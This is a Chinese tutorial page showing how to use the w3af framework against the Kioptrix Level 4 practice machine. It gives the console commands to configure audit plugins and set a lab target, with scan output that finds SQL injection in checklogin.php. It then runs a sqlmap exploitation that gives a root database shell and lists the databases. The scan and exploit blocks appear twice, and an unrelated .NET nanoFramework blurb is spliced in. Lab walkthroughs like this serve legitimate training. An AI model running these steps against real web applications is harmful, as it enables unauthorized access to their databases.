W3af简单使用教程
教程 简单 使用
2023-09-11 14:20:34 时间
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×00 概述
在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.
0×01 简介
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×02 安装
root@bt:~# apt-get install w3af
0×03 启动
root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console
0×04 漏洞扫描配置
w3af plugins//进入插件模块w3af/plugins list discovery //列出所有用于发现的插件w3af/plugins discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件w3af/plugins list audit //列出所有用于漏洞的插件w3af/plugins audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins back//返回主模块w3af target//进入配置目标的模块w3af/config:target set target http://192.168.244.132///把目标设置为http://192.168.244.132/w3af/config:target back//返回主模块
0×05 漏洞扫描
w3af start ---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John Submit=Login mypassword=dz"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//开始扫描
w3af exploit //进入漏洞利用模块w3af/exploit list exploit//列出所有用于漏洞利用的插件w3af/exploit exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试
---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] sqlobject ( dbms: "MySQL = 5.0.0" | ruser: "root@localhost" ) Please use the interact command to interact with the shell objects.---//测试存在SQL注入漏洞//这里要记住shell objects(这里是0),等一下要用到0x07 漏洞利用w3af/exploit interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0 ---//sqlmap的一个交互式模块w3af/exploit/sqlmap-0 dbs ---Available databases: [3]:[*] information_schema[*] members[*] mysql---//成功获得数据库信息
快速入门 .NET nanoFramework 开发 ESP32-Pico 应用 本文是一篇适合初学者的 .NET nanoFramework 保姆级入门教程,并提供了基本的入门程序并介绍了微雪的 ESP32-S2-Pico 使用 .NET nanoFramework 开发过程的基础知识。
w3af start ---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John Submit=Login mypassword=dz"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//开始扫描
w3af exploit //进入漏洞利用模块w3af/exploit list exploit//列出所有用于漏洞利用的插件w3af/exploit exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试
---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] sqlobject ( dbms: "MySQL = 5.0.0" | ruser: "root@localhost" ) Please use the interact command to interact with the shell objects.---//测试存在SQL注入漏洞//这里要记住shell objects(这里是0),等一下要用到0x07 漏洞利用w3af/exploit interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0 ---//sqlmap的一个交互式模块w3af/exploit/sqlmap-0 dbs ---Available databases: [3]:[*] information_schema[*] members[*] mysql---//成功获得数据库信息
快速入门 .NET nanoFramework 开发 ESP32-Pico 应用 本文是一篇适合初学者的 .NET nanoFramework 保姆级入门教程,并提供了基本的入门程序并介绍了微雪的 ESP32-S2-Pico 使用 .NET nanoFramework 开发过程的基础知识。
相关文章
- U3D版本《暗黑世界V1.0》编译——图文教程!
- JAVA 注解教程(一)简单介绍
- github简单使用教程
- 在C#代码中应用Log4Net系列教程(附源代码)
- Laravel 5 系列入门教程(一)【最适合中国人的 Laravel 教程】
- 【第3版emWin教程】第8章 emWin6.x的带OS方式移植(STM32H7之RGB接口)
- 【二代示波器教程】第11章 示波器设计—功能模块划分
- SAP UI5 应用开发教程之八十六 - 动手开发一个最简单的本地 Mock 数据服务器试读版
- 最简单的SAP云平台开发教程 - 如何开发UI5应用并运行在SAP云平台上
- SAP UI5 应用开发教程之九十五 - SAP UI5 下拉菜单(Select) 控件的使用方式试读版
- 《Springboot极简教程》使用Spring Boot, JPA, Mysql, ThymeLeaf,gradle, Kotlin快速构建一个CRUD Web App
- PyTorch1.8-gpu和TensorFlow-gpu-2.5已发布【附下载地址和安装教程】
- Win11系统电脑硬盘分区方法教程
- FusionCharts简单教程(一)---建立第一个FusionCharts图形
- Pytest自动化框架-权威教程02-Pytest 使用及调用方法
- 【软件测试】让0基础纯小白也能上手写Python,保姆级教程(一)
- Laravel教程 五:MVC的基本流程
- MySQL使用简单教程